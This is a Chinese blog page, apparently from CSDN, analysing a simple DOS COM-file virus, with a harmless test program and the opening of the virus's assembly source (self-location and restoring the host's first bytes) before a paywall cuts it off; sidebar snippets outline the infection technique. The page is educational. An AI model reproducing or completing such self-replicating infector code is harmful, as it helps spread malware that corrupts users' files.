简易com病毒分析

最新推荐文章于 2024-10-12 10:20:40 发布
最新推荐文章于 2024-10-12 10:20:40 发布
阅读量1.8k 收藏
点赞数 1
分类专栏: 汇编
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38184895/article/details/79874852
版权
本文档详细分析了一个简单的COM病毒源代码,包括病毒的启动过程、文件感染机制以及如何利用DOS中断进行文件操作。病毒通过在目标文件头部插入跳转指令,实现自身在每次运行时的激活,并可能导致文件无限感染。
摘要由CSDN通过智能技术生成

.model tiny
program segment

assume cs:program,ds:program,ss:program,es:program
org 0100h

main proc near
MOV DX,offset message
MOV AH,09h
INT 21h
MOV AH,4Ch ;调用DOS中断4C号功能(返回操作系统)
INT 21h
RET

message db 0dh,'This a simple com program for a test',0dh,0ah,'$'

program ends
END

代码virus.asm:
CSEG SEGMENT
ASSUME CS:CSEG,DS:CSEG,SS:CSEG
main PROC NEAR
mainstart:
CALL vstart ;病毒的代码开始处
vstart:
POP SI ;得到当前地址 得到vstart的的绝对地址
MOV BP,SI ;保存当前地址
PUSH SI
MOV AH,9
ADD SI,OFFSET message-OFFSET vstart ;显示预设字符串 动态定位
MOV DX,SI
INT 21h
POP SI //恢复绝对地址
ADD SI,OFFSET yuan4byte-OFFSET vstart ;恢复原程序中的前四个字节
MOV DI,100h ;目的地址
MOV AX,DS:[SI] ;开始复制
MOV DS:[DI],AX
INC SI
INC SI
INC DI
INC DI

最低0.47元/天 解锁文章
孑曦曦孑
关注
专栏目录
病毒分析
bilibili的博客
11-14 7643
病毒分析
一个简单的HTML病毒分析
雷耀上多宝平台的专栏
05-12 1008
一直就想写这篇东西了,只是上班时说要上班,不写,回家后又忙着玩游戏,丢一边去了。现在只好不务正业的开写了,希望头儿不会知道我的blog。哈哈   在很久之前就对HTML的病毒很感兴趣了,很好奇怎么能远程向本地不经过允许就能下载可执行文件的,只是一直没机会搞得到ASP的原码,所以不才敢断章取义的去作什么分析。最近一次听一朋友说他看一个网页时病毒防火墙提示有病毒,叫我小心(先感谢一下他先),我闪了一下
DOS下COM病毒分析思路
11-17 1325
也许有人会说,DOS已经是明日黄花了,怎么还讨论DOS病毒呢?这不是很落后吗?其实不然。病毒技术的鼎盛发展时期是在DOS年代——Poly Engine、Metamorphism等技术都是在DOS病毒中发展起来的,现在到了Windows时代,反而流传的是一些木马、蠕虫等没有多少技术含量的病毒,虽然不乏精品,但同dos时代的病毒相比,经典可就算不上了!(个人观点,不免偏激)。请记住:计算机技术从来都不
计算机系统安全技术知识详解(非常详细),零基础入门到精通,看这一篇就够了
最新发布
分享Python知识
10-12 932
计算机系统安全技术知识详解(非常详细),零基础入门到精通,看这一篇就够了
COM病毒概述以及实验操作
Yo_ol的博客
03-29 6466
计算机病毒COM病毒概述和实验过程
COM病毒概述以及实验操作文档
Yo_ol的博客
04-12 695
COM病毒是一种通过利用Windows操作系统中的“组件对象模型”(Component Object Model,COM)技术传播的计算机病毒。这个程序可以在Windows操作系统中创建新的COM对象,将恶意代码注入到目标系统中,并开始自我复制和传播。通过上述实验,我们可以了解COM病毒的原理和工作方式,并学习如何防御和清除它们。使用反病毒软件或其他安全工具对病毒进行分析,并了解它是如何感染目标系统、自我复制和传播的。同时,了解如何检测和清除COM病毒,并研究如何防止它们继续感染其他系统。
Windows 简易优化软件
07-01
此外,互联网上分享的软件资源需谨慎对待,确保下载来源安全,避免下载带有病毒或恶意软件的优化工具。在000car.com或其他网站上寻找分享时,务必检查软件的信誉和更新情况,以确保使用的是最新且安全的版本。
python挖矿木马_kworkerds 挖矿木马简单分析及清理
weixin_39952800的博客
12-06 718
公司之前的开发和测试环境是在腾讯云上,部分服务器中过一次挖矿木马 kworkerds,本文为我当时分析和清理木马的记录,希望能对大家有所帮助。现象top 命令查看,显示 CPU 占用 100%,进程名无明显规则,如:TzBeq3AM。进程有时候会被隐藏,通过分析脚本删除部分依赖文件,可以显示出来。存在可疑的 python 进程。crontab 被写入了一个定时任务,每半小时左右会从 pastebi...
病毒和杀毒软件的加壳原理
03-30
### 病毒和杀毒软件的加壳原理 #### 一、壳的简要介绍 **压缩壳**主要用于减少程序的体积,便于存储和传输,同时也能够阻止逆向工程的进行,使得黑客难以分析其内部结构。压缩壳通常通过高压缩算法来减少程序的...
2024年Java多线程实战-从零手搓一个简易线程池(一)定义任务等待队列
2301_82257383的博客
05-02 1035
在多线程编程中,线程池是一种非常重要的工具。它可以帮助我们高效地管理线程资源,避免频繁创建和销毁线程带来的性能开销。Java中提供了强大的线程池实现,如 ThreadPoolExecutor ,但有时我们可能希望了解其内部原理,并实现一个简单的线程池来加深对其工作机制的理解,手写线程池也是很多大厂常考的笔试题。开个新坑-手搓简易线程池。本系列文章将从零开始,一步步手工编码实现一个简单但功能完备的线程池。我们将逐步介绍线程池的各个核心组件,并分析它们的作用和实现思路。
DOS平台COM文件病毒初探
weixin_33963189的博客
05-09 1087
实验环境同上一篇 上代码: CSEGSEGMENTASSUMECS:CSEG,DS:CSEG,SS:CSEG,ES:CSEGmainPROCNEARmainstart:CALLvstart;病毒的代码开始处vstart:POPSI;得到当前地址MOVBP,SI;保存当前地址;PUSHSI...
感染com文件的DOS病毒汇编代码
04-16
感染com文件的DOS病毒汇编代码,原理性的 无危险性
COM病毒实验原理.pdf
07-10
COM病毒实验原理.pdf 学习资料 复习资料 教学资源
计算机病毒与防护:COM病毒感染和修复.pptx
06-10
COM病毒 感染和修复 COM病毒实验 COM病毒文件原理 感染COM文件的典型做法dian'xin CS:0100 jmp endoffile //db 0E9H,0100H处为文件的开头 ... //dw COM文件的实际大小 Endoffile: Virusstart: //病毒代码开始 mov ax,orgcode //orgcode db 3 dup(?) mov [100],ax mov al,[orgcode+2] //源文件由0100开始的3个字节 mov [102],al virussize=$-virusstart //db 0E9H Resume: jmp 100 //dw 当前地址- (COM文件的实际大小+病毒代码大小) COM病毒文件原理 COM病毒 感染过程 感谢聆听
汇编编写com病毒的代码
05-12
传染com文件的程序代码。汇编编写先对简单~ 病毒基本是如何传染的。
典型病毒分析
01-18
对网络病毒的深入理解对网络病毒的深入理解对网络病毒的深入理解
com感染病毒分析
笔记本
04-02 2296
先附上com病毒的源码 virus.asm CSEG SEGMENT ASSUME CS:CSEG,DS:CSEG,SS:CSEG main PROC NEAR mainstart: CALL vstart vstart: POP SI MOV BP,SI PUSH SI MOV AH,9 ADD SI,OFFSET message-OFFSET vstart MOV DX,S...
COM病毒实验原理
m0_73734159的博客
11-19 539
了解COM病毒的原理,掌握COM病毒分析及其修改过程。
菜鸟的病毒分析 超菜 dos 蹩脚的.com文件感染病毒分析
abcd8080的博客
07-03 396
dos 蹩脚的.com文件感染病毒分析病毒行为:感染com文件就这么蹩脚 第一次做分析 原谅我如此之菜吧流程:恢复已感染文件的头三个字节 查找.com后缀文件 判断是否是真实的com文件 如果是打开文件 保存前三个字节属性等信息 添加病毒代码 添加跳转 恢复属性等关闭文件 下面是用到的中断 psp dta结构可以去看雪上查查0F 打开文件 DS:DX=FCB首地址 AL=00 文件找到...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值